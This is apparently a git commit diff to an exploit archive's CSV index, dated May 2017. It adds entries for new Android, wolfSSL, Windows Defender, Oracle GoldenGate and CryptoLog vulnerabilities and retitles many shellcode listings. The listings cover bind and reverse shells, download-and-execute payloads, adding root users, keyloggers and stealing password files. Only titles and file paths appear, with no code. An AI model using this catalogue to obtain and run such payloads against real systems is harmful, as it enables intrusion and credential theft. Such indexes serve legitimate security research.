DB: 2017-05-10
10 new exploits LG G4 MRA58K - 'liblg_parser_mkv.so' Bad Allocation Calls LG G4 MRA58K - 'mkvparser::Tracks constructor' Failure to Initialise Pointers LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflows wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One Microsoft Windows 8 / 8.1 / 10 / Windows Server / SCEP_ Microsoft Security Essentials - 'MsMpEng' Remotely Exploitable Type Confusion Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution Crypttech CryptoLog - Remote Code Execution (Metasploit) BSD/x86 - portbind port 31337 Shellcode (83 bytes) BSD/x86 - portbind port random Shellcode (143 bytes) BSD/x86 - Portbind Port 31337 Shellcode (83 bytes) BSD/x86 - Portbind Random Port Shellcode (143 bytes) BSD/x86 - execve /bin/sh Crypt /bin/sh Shellcode (49 bytes) BSD/x86 - execve /bin/sh Crypt Shellcode (49 bytes) BSD/x86 - reverse 6969 portbind Shellcode (129 bytes) BSD/x86 - Portbind Reverse 6969 Shellcode (129 bytes) FreeBSD/x86 - /bin/cat /etc/master.passwd Null Free Shellcode (65 bytes) FreeBSD/x86 - reverse portbind 127.0.0.1:8000 /bin/sh Shellcode (89 bytes) FreeBSD/x86 - /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes) FreeBSD/x86 - Rortbind Reverse 127.0.0.1:8000 /bin/sh Shellcode (89 bytes) FreeBSD/x86 - portbind 4883 with auth Shellcode (222 bytes) FreeBSD/x86 - Portbind Port 4883 with Auth Shellcode (222 bytes) FreeBSD/x86 - connect (Port 31337) Shellcode (102 bytes) FreeBSD/x86 - Connect Port 31337 Shellcode (102 bytes) Linux/x86 - execve Null Free Shellcode (Generator) Linux/x86 - Portbind Payload Shellcode (Generator) Windows XP SP1 - Portbind Payload Shellcode (Generator) Linux/x86 - execve Null-Free Shellcode (Generator) Linux/x86 - Portbind Shellcode (Generator) Windows XP SP1 - Portbind Shellcode (Generator) Linux/x86 - cmd Null Free Shellcode (Generator) Linux/x86 - cmd Null-Free Shellcode (Generator) Cisco IOS - Connectback (Port 21) Shellcode Cisco IOS - Connectback Port 21 Shellcode Linux/MIPS (Linksys WRT54G/GL) - 4919 port bind Shellcode (276 bytes) Linux/MIPS (Linksys WRT54G/GL) - Bind Port 4919 Shellcode (276 bytes) Linux/SPARC - portbind port 8975 Shellcode (284 bytes) Linux/SPARC - Portbind Port 8975 Shellcode (284 bytes) Linux/x86 - 4444 Port Binding Shellcode (xor-encoded) (152 bytes) Linux/x86 - Binding Port 4444 Shellcode (xor-encoded) (152 bytes) Linux/x86 - bindport 8000 & execve iptables -F Shellcode (176 bytes) Linux/x86 - bindport 8000 & add user with root access Shellcode (225+ bytes) Linux/x86 - 8000 Bind Port ASM Code Linux Shellcode (179 bytes) Linux/x86 - Bind Port 8000 & Execve Iptables -F Shellcode (176 bytes) Linux/x86 - Bind Port 8000 & Add User with Root Access Shellcode (225+ bytes) Linux/x86 - Bind Port 8000 ASM Code Linux Shellcode (179 bytes) Linux/x86 - connect-back port UDP/54321 live packet capture Shellcode (151 bytes) Linux/x86 - append rsa key to /root/.ssh/authorized_keys2 Shellcode (295 bytes) Linux/x86 - Connectback Port 54321/UDP Live Packet Capture Shellcode (151 bytes) Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes) Linux/x86 - Connect Back Port 8192.send.exit /etc/shadow Shellcode (155 bytes) Linux/x86 - Connectback Port 8192.send.exit /etc/shadow Shellcode (155 bytes) Linux/x86 - setuid/portbind (Port 31337) Shellcode (96 bytes) Linux/x86 - portbind (2707) Shellcode (84 bytes) Linux/x86 - setuid/portbind Port 31337 Shellcode (96 bytes) Linux/x86 - Portbind 2707 Shellcode (84 bytes) Linux/x86 - SET_PORT() portbind 31337/TCP Shellcode (100 bytes) Linux/x86 - SET_PORT() Portbind 31337/TCP Shellcode (100 bytes) Linux/x86 - Password Authentication portbind (64713) Shellcode (166 bytes) Linux/x86 - portbind (port 64713) Shellcode (86 bytes) Linux/x86 - Password Authentication Portbind 64713 Shellcode (166 bytes) Linux/x86 - Portbind Port 64713 Shellcode (86 bytes) Linux/x86 - portbind port 5074 toupper Shellcode (226 bytes) Linux/x86 - Add user 't00r' encrypt Shellcode (116 bytes) Linux/x86 - Portbind Port 5074 toupper Shellcode (226 bytes) Linux/x86 - Add User 't00r' encrypt Shellcode (116 bytes) Linux/x86 - portbind port 5074 Shellcode (92 bytes) Linux/x86 - portbind port 5074 + fork() Shellcode (130 bytes) Linux/x86 - Add user 't00r' Shellcode (82 bytes) Linux/x86 - Portbind Port 5074 Shellcode (92 bytes) Linux/x86 - Portbind Port 5074 + fork() Shellcode (130 bytes) Linux/x86 - Add User 't00r' Shellcode (82 bytes) Linux/x86-64 - bindshell port 4444 Shellcode (132 bytes) Linux/x86-64 - Bindshell Port 4444 Shellcode (132 bytes) NetBSD/x86 - callback Shellcode (port 6666) (83 bytes) NetBSD/x86 - Callback Port 6666 Shellcode (83 bytes) OpenBSD/x86 - portbind port 6969 Shellcode (148 bytes) OpenBSD/x86 - Portbind Port 6969 Shellcode (148 bytes) Solaris/SPARC - portbind (port 6666) Shellcode (240 bytes) Solaris/SPARC - Portbind Port 6666 Shellcode (240 bytes) Solaris/SPARC - portbind port 6789 Shellcode (228 bytes) Solaris/SPARC - Portbind Port 6789 Shellcode (228 bytes) Solaris/SPARC - portbinding Shellcode (240 bytes) Solaris/x86 - portbind/TCP Shellcode (Generator) Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null Free Shellcode (39 bytes) Solaris/SPARC - Portbind Shellcode (240 bytes) Solaris/x86 - Portbind TCP Shellcode (Generator) Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null-Free Shellcode (39 bytes) Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 Shellcode Windows 5.0 < 7.0 x86 - Bind Shell Port 28876 Null-Free Shellcode Win32 - telnetbind by Winexec 23 port Shellcode (111 bytes) Win32 - Winexec Telnet Bind 23 Port Shellcode (111 bytes) Win32 XP SP2 FR - Sellcode cmd.exe Shellcode (32 bytes) Win32 XP SP2 (FR) - Sellcode cmd.exe Shellcode (32 bytes) Win32 - Download and Execute Shellcode (Generator) (Browsers Edition) (275+ bytes) Win32 - Download & Execute Shellcode (Generator) (Browsers Edition) (275+ bytes) Win32 - download and execute Shellcode (124 bytes) Win32 - Download & Execute Shellcode (124 bytes) Windows NT/2000/XP (Russian) - Add User _slim_ Shellcode (318 bytes) Windows NT/2000/XP (Russian) - Add User 'slim' Shellcode (318 bytes) Windows XP - download and exec source Shellcode Windows XP SP1 - Portshell on port 58821 Shellcode (116 bytes) Windows XP - Download & Exec Shellcode Windows XP SP1 - Portshell Port 58821 Shellcode (116 bytes) Win64 - (URLDownloadToFileA) download and execute Shellcode (218+ bytes) Win64 - (URLDownloadToFileA) Download & Execute Shellcode (218+ bytes) Win32 XP SP3 - Add Firewall Rule to allow TCP traffic on port 445 Shellcode FreeBSD/x86 - portbind (Port 1337) Shellcode (167 bytes) Win32 XP SP3 - Add Firewall Rule to Allow TCP Traffic on Port 445 Shellcode FreeBSD/x86 - Portbind Port 1337 Shellcode (167 bytes) Windows XP Pro SP2 English - _Message-Box_ Null Free Shellcode (16 bytes) Windows XP Pro SP2 English - _Wordpad_ Null Free Shellcode (12 bytes) Windows XP Professional SP2 (English) - Message Box Null-Free Shellcode (16 bytes) Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes) Win32 XP SP2 FR - calc Shellcode (19 bytes) Win32 XP SP2 (FR) - calc Shellcode (19 bytes) Win32 XP SP3 English - cmd.exe Shellcode (26 bytes) Win32 XP SP2 Turkish - cmd.exe Shellcode (26 bytes) Win32 XP SP3 (English) - cmd.exe Shellcode (26 bytes) Win32 XP SP2 (Turkish) - cmd.exe Shellcode (26 bytes) Windows XP Home Edition SP2 English - calc.exe Shellcode (37 bytes) Windows XP Home Edition SP3 English - calc.exe Shellcode (37 bytes) Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes) Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes) Windows XP Professional SP2 ITA - calc.exe Shellcode (36 bytes) Windows XP Professional SP2 (ITA) - calc.exe Shellcode (36 bytes) Windows XP SP2 FR - Download and Exec Shellcode Windows XP SP2 (FR) - Download & Exec Shellcode Windows 7 Pro SP1 64 FR - (Beep) Shellcode (39 bytes) Windows 7 Professional SP1 x64 (FR) - (Beep) Shellcode (39 bytes) Linux/x86 - netcat connect back port 8080 Shellcode (76 bytes) Linux/x86 - Netcat Connectback Port 8080 Shellcode (76 bytes) Linux/x86-64 - Add root user _shell-storm_ with password _leet_ Shellcode (390 bytes) Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) Linux/x86-64 - Add root user _shell-storm_ with password 'leet' Shellcode (390 bytes) Windows XP SP3 (SPA) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) Linux/x86 - bind shell port 64533 Shellcode (97 bytes) Linux/x86 - Bind Shell Port 64533 Shellcode (97 bytes) Linux - 125 bind port to 6778 XOR encoded polymorphic Shellcode (125 bytes) Linux - _nc -lp 31337 -e /bin//sh_ polymorphic Shellcode (91 bytes) Linux - 125 Bind Port 6778 XOR Encoded Polymorphic Shellcode (125 bytes) Linux - _nc -lp 31337 -e /bin//sh_ Polymorphic Shellcode (91 bytes) Linux/x86 - netcat bindshell port 8080 Shellcode (75 bytes) Linux/x86 - /bin/sh Polymorphic Null Free Shellcode (46 bytes) Linux/x86 - Netcat BindShell Port 8080 Shellcode (75 bytes) Linux/x86 - /bin/sh Polymorphic Null-Free Shellcode (46 bytes) BSD/x86 - bindshell on port 2525 Shellcode (167 bytes) BSD/x86 - Bindshell Port 2525 Shellcode (167 bytes) Win32/XP SP3 (TR) - Add Admin _zrl_ Account Shellcode (127 bytes) Win32/XP SP3 (TR) - Add Administrator 'zrl' Shellcode (127 bytes) Win32/XP Pro SP3 (EN) x86 - Add new local administrator _secuid0_ Shellcode (113 bytes) Win32 - Add New Local Administrator _secuid0_ Shellcode (326 bytes) ARM - Bindshell port 0x1337 Shellcode Win32/XP Professional SP3 (EN) x86 - Add New Local Administrator 'secuid0' Shellcode (113 bytes) Win32 - Add New Local Administrator 'secuid0' Shellcode (326 bytes) ARM - Bindshell Port 0x1337 Shellcode OSX/Intel (x86-64) - setuid shell Shellcode (51 bytes) OSX/Intel x86-64 - setuid shell Shellcode (51 bytes) Win32 - speaking Shellcode Win32 - Speaking 'You got pwned!' Shellcode BSD/x86 - 31337 portbind + fork Shellcode (111 bytes) BSD/x86 - 31337 Portbind + fork Shellcode (111 bytes) Linux/x86 - netcat bindshell port 6666 Shellcode (69 bytes) Linux/x86 - Netcat BindShell Port 6666 Shellcode (69 bytes) Windows - WinExec add new local administrator _RubberDuck_ + ExitProcess Shellcode (279 bytes) Windows - WinExec Add New Local Administrator 'RubberDuck' + ExitProcess Shellcode (279 bytes) Win32/PerfectXp-pc1/SP3 TR - Add Admin _kpss_ Shellcode (112 bytes) Win32/PerfectXp-pc1/SP3 (TR) - Add Administrator 'kpss' Shellcode (112 bytes) Linux/MIPS - connect back Shellcode (port 0x7a69) (168 bytes) Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes) Windows XP Pro SP3 - Full ROP calc Shellcode (428 bytes) Windows XP Professional SP3 - Full ROP calc Shellcode (428 bytes) Windows RT ARM - Bind Shell (Port 4444) Shellcode Windows RT ARM - Bind Shell Port 4444 Shellcode Windows - Add Admin User _BroK3n_ Shellcode (194 bytes) Windows - Add Administrator 'BroK3n' Shellcode (194 bytes) Linux/x86 - Obfuscated Shellcode chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User _ALI_ & Execute /bin/bash (521 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User 'ALI' & Execute /bin/bash Obfuscated Shellcode (521 bytes) Linux/x86-64 - Bind 4444/TCP Port Shellcode (81 bytes / 96 bytes with password) Linux/x86-64 - Bind Port 4444/TCP Shellcode (81 bytes / 96 bytes with password) Windows x86 - Obfuscated Shellcode Add Administrator _ALI_ & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service (1218 bytes) Windows x64 - Obfuscated Shellcode Add Administrator _ALI_ & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service (1218 bytes) Windows x86 - Add Administrator 'ALI' & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Windows x64 - Add Administrator 'ALI' & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Windows XP x86-64 - Download & execute Shellcode (Generator) Windows XP x86-64 - Download & Execute Shellcode (Generator) Linux/x86 - Bind Shell 33333/TCP Port Shellcode (96 bytes) Linux/x86 - Bind Shell Port 33333/TCP Shellcode (96 bytes) Win32/XP SP3 - Create (_file.txt_) Shellcode (83 bytes) Win32/XP SP3 - Create ('file.txt') Shellcode (83 bytes) Windows x86 - user32!MessageBox _Hello World!_ Null Free Shellcode (199 bytes) Windows x86 - user32!MessageBox 'Hello World!' Null-Free Shellcode (199 bytes) OSX/x86-64 - /bin/sh Null Free Shellcode (34 bytes) OSX/x86-64 - /bin/sh Null-Free Shellcode (34 bytes) OSX/x86-64 - 4444/TPC port bind Nullfree Shellcode (144 bytes) OSX/x86-64 - Bind Port 4444/TPC Null-free Shellcode (144 bytes) Google Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes) Google Android - Telnetd Port 1035 with Parameters Shellcode (248 bytes) Linux/x86-64 - Bindshell 31173 port with Password Shellcode (92 bytes) Linux/x86-64 - Bindshell Port 31173 with Password Shellcode (92 bytes) Windows XP < 10 - WinExec Null Free Shellcode (Python) (Generator) Windows XP < 10 - WinExec Null-Free Shellcode (Python) (Generator) Linux/x86-64 - Bind 4444/TCP Port Shellcode (103 bytes) Linux/x86-64 - Bind Port 4444/TCP Shellcode (103 bytes) Linux x86/x86-64 - tcp_bind (Port 4444) Shellcode (251 bytes) Linux x86/x86-64 - tcp_bind Port 4444 Shellcode (251 bytes) Windows x86 - Download & Run via WebDAV Null Free Shellcode (96 bytes) Windows x86 - Download & Run via WebDAV Null-Free Shellcode (96 bytes) Linux/x86-64 - bindshell (Port 5600) Shellcode (81 bytes) Linux/x86-64 - Bindshell Port 5600 Shellcode (81 bytes) Linux/x86-64 - bindshell (Port 5600) Shellcode (86 bytes) Linux/x86-64 - Bindshell Port 5600 Shellcode (86 bytes) Linux/x86 - Bind TCP Port 1472 (IPv6) Shellcode (1250 bytes) Linux/x86 - Bind Port 1472/TCP (IPv6) Shellcode (1250 bytes) Windows - Primitive Keylogger to File Null Free Shellcode (431 (0x01AF) bytes) Windows - Primitive Keylogger to File Null-Free Shellcode (431 (0x01AF) bytes) Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes) Windows - Functional Keylogger to File Null-Free Shellcode (601 (0x0259) bytes) Linux/x86-64 - Reverse TCP Shell Null Free Shellcode (134 bytes) Linux/x86-64 - Reverse TCP Shell Null-Free Shellcode (134 bytes) Linux/x86 - NetCat Bind Shellcode with Port (44 / 52 bytes) Linux/x86 - zsh TCP Port 9090 Bind Shellcode (96 bytes) Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes) Linux/x86 - Netcat Bind Shellcode with Port (44 / 52 bytes) Linux/x86 - zsh Bind Port 9090/TCP Shellcode (96 bytes) Linux/x86 - zsh Reverse Port 9090/TCP Shellcode (80 bytes) Linux/x86-64 - Bind 5600 TCP Port - Shellcode (87 bytes) Linux/x86-64 - Bind Port 5600/TCP - Shellcode (87 bytes) LogRhythm Network Monitor - Authentication Bypass / Command Injection I_ Librarian 4.6 / 4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting
This commit is contained in:
parent
6f37b94a66
commit
4e3947178d
12 changed files with 1133 additions and 110 deletions
229
files.csv
229
files.csv
|
@ -5485,6 +5485,10 @@ id,file,description,date,author,platform,type,port
|
|||
41957,platforms/windows/dos/41957.html,"Microsoft Internet Explorer 11 - 'CMarkup::DestroySplayTree' Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos,0
|
||||
41965,platforms/java/dos/41965.txt,"CloudBees Jenkins 2.32.1 - Java Deserialization",2017-05-05,SecuriTeam,java,dos,0
|
||||
41974,platforms/linux/dos/41974.rb,"RPCBind / libtirpc - Denial of Service",2017-05-08,"Guido Vranken",linux,dos,111
|
||||
41981,platforms/android/dos/41981.txt,"LG G4 MRA58K - 'liblg_parser_mkv.so' Bad Allocation Calls",2017-05-09,"Google Security Research",android,dos,0
|
||||
41982,platforms/android/dos/41982.txt,"LG G4 MRA58K - 'mkvparser::Tracks constructor' Failure to Initialise Pointers",2017-05-09,"Google Security Research",android,dos,0
|
||||
41983,platforms/android/dos/41983.txt,"LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflows",2017-05-09,"Google Security Research",android,dos,0
|
||||
41984,platforms/multiple/dos/41984.txt,"wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One",2017-05-09,Talos,multiple,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -15487,6 +15491,9 @@ id,file,description,date,author,platform,type,port
|
|||
41935,platforms/hardware/remote/41935.rb,"WePresent WiPG-1000 - Command Injection (Metasploit)",2017-04-25,Metasploit,hardware,remote,80
|
||||
41942,platforms/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,python,remote,22
|
||||
41964,platforms/macos/remote/41964.html,"Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo and niklasb",macos,remote,0
|
||||
41975,platforms/windows/remote/41975.txt,"Microsoft Windows 8 / 8.1 / 10 / Windows Server / SCEP_ Microsoft Security Essentials - 'MsMpEng' Remotely Exploitable Type Confusion",2017-05-09,"Google Security Research",windows,remote,0
|
||||
41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0
|
||||
41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,Metasploit,python,remote,80
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -15495,14 +15502,14 @@ id,file,description,date,author,platform,type,port
|
|||
13245,platforms/bsd_x86/shellcode/13245.c,"BSD/x86 - setuid/portbind 31337/TCP Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0
|
||||
13246,platforms/bsd_x86/shellcode/13246.c,"BSD/x86 - execve /bin/sh multiplatform Shellcode (27 bytes)",2004-09-26,n0gada,bsd_x86,shellcode,0
|
||||
13247,platforms/bsd_x86/shellcode/13247.c,"BSD/x86 - execve /bin/sh setuid (0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
|
||||
13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - portbind port 31337 Shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0
|
||||
13249,platforms/bsd_x86/shellcode/13249.c,"BSD/x86 - portbind port random Shellcode (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode,0
|
||||
13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - Portbind Port 31337 Shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0
|
||||
13249,platforms/bsd_x86/shellcode/13249.c,"BSD/x86 - Portbind Random Port Shellcode (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode,0
|
||||
13250,platforms/bsd_x86/shellcode/13250.c,"BSD/x86 - break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
|
||||
13251,platforms/bsd_x86/shellcode/13251.c,"BSD/x86 - execve /bin/sh Crypt /bin/sh Shellcode (49 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0
|
||||
13251,platforms/bsd_x86/shellcode/13251.c,"BSD/x86 - execve /bin/sh Crypt Shellcode (49 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0
|
||||
13252,platforms/bsd_x86/shellcode/13252.c,"BSD/x86 - execve /bin/sh ENCRYPT* Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
|
||||
13254,platforms/bsd_x86/shellcode/13254.c,"BSD/x86 - connect torootteam.host.sk:2222 Shellcode (93 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0
|
||||
13255,platforms/bsd_x86/shellcode/13255.c,"BSD/x86 - cat /etc/master.passwd | mail [email] Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
|
||||
13256,platforms/bsd_x86/shellcode/13256.c,"BSD/x86 - reverse 6969 portbind Shellcode (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0
|
||||
13256,platforms/bsd_x86/shellcode/13256.c,"BSD/x86 - Portbind Reverse 6969 Shellcode (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0
|
||||
13257,platforms/bsdi_x86/shellcode/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,bsdi_x86,shellcode,0
|
||||
13258,platforms/bsdi_x86/shellcode/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,bsdi_x86,shellcode,0
|
||||
13260,platforms/bsdi_x86/shellcode/13260.c,"BSDi/x86 - execve /bin/sh toupper evasion Shellcode (97 bytes)",2004-09-26,anonymous,bsdi_x86,shellcode,0
|
||||
|
@ -15511,11 +15518,11 @@ id,file,description,date,author,platform,type,port
|
|||
13263,platforms/freebsd_x86/shellcode/13263.txt,"FreeBSD/x86 - connect back.send.exit /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,freebsd_x86,shellcode,0
|
||||
13264,platforms/freebsd_x86/shellcode/13264.txt,"FreeBSD/x86 - kill all processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0
|
||||
13265,platforms/freebsd_x86/shellcode/13265.c,"FreeBSD/x86 - rev connect_ recv_ jmp_ return results Shellcode (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode,0
|
||||
13266,platforms/freebsd_x86/shellcode/13266.asm,"FreeBSD/x86 - /bin/cat /etc/master.passwd Null Free Shellcode (65 bytes)",2008-08-25,sm4x,freebsd_x86,shellcode,0
|
||||
13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - reverse portbind 127.0.0.1:8000 /bin/sh Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
|
||||
13266,platforms/freebsd_x86/shellcode/13266.asm,"FreeBSD/x86 - /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,freebsd_x86,shellcode,0
|
||||
13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Rortbind Reverse 127.0.0.1:8000 /bin/sh Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
|
||||
13268,platforms/freebsd_x86/shellcode/13268.asm,"FreeBSD/x86 - setuid(0); execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
|
||||
13269,platforms/freebsd_x86/shellcode/13269.c,"FreeBSD/x86 - encrypted Shellcode /bin/sh (48 bytes)",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode,0
|
||||
13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - portbind 4883 with auth Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0
|
||||
13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - Portbind Port 4883 with Auth Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0
|
||||
13271,platforms/freebsd_x86/shellcode/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,freebsd_x86,shellcode,0
|
||||
13272,platforms/freebsd_x86/shellcode/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2006-04-14,IZ,freebsd_x86,shellcode,0
|
||||
13273,platforms/freebsd_x86/shellcode/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (2) (23 bytes)",2004-09-26,marcetam,freebsd_x86,shellcode,0
|
||||
|
@ -15523,25 +15530,25 @@ id,file,description,date,author,platform,type,port
|
|||
13275,platforms/freebsd_x86/shellcode/13275.c,"FreeBSD/x86 - kldload /tmp/o.o Shellcode (74 bytes)",2004-09-26,dev0id,freebsd_x86,shellcode,0
|
||||
13276,platforms/freebsd_x86/shellcode/13276.c,"FreeBSD/x86 - chown 0:0 _ chmod 6755 & execve /tmp/sh Shellcode (44 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0
|
||||
13277,platforms/freebsd_x86/shellcode/13277.c,"FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0
|
||||
13278,platforms/freebsd_x86/shellcode/13278.asm,"FreeBSD/x86 - connect (Port 31337) Shellcode (102 bytes)",2004-09-26,Scrippie,freebsd_x86,shellcode,0
|
||||
13278,platforms/freebsd_x86/shellcode/13278.asm,"FreeBSD/x86 - Connect Port 31337 Shellcode (102 bytes)",2004-09-26,Scrippie,freebsd_x86,shellcode,0
|
||||
13279,platforms/freebsd_x86-64/shellcode/13279.c,"FreeBSD/x86-64 - exec(_/bin/sh_) Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode,0
|
||||
13280,platforms/freebsd_x86-64/shellcode/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,freebsd_x86-64,shellcode,0
|
||||
13281,platforms/generator/shellcode/13281.c,"Linux/x86 - execve Null Free Shellcode (Generator)",2009-06-29,certaindeath,generator,shellcode,0
|
||||
13282,platforms/generator/shellcode/13282.php,"Linux/x86 - Portbind Payload Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
|
||||
13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - Portbind Payload Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
|
||||
13281,platforms/generator/shellcode/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,generator,shellcode,0
|
||||
13282,platforms/generator/shellcode/13282.php,"Linux/x86 - Portbind Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
|
||||
13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - Portbind Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
|
||||
13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic Shellcode with printable ASCII characters",2008-08-31,sorrow,generator,shellcode,0
|
||||
13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0
|
||||
13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0
|
||||
13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode Encoder/Decoder",2008-08-04,"Avri Schneider",generator,shellcode,0
|
||||
13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x requests Shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0
|
||||
13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Shellcode Encoding Tool (Generator)",2005-12-16,Skylined,generator,shellcode,0
|
||||
13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0
|
||||
13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback (Port 21) Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
|
||||
13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback Port 21 Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
|
||||
13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS - Bind Shellcode Password Protected (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
|
||||
13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - Tiny Shellcode (New TTY_ Privilege level to 15_ No password)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
|
||||
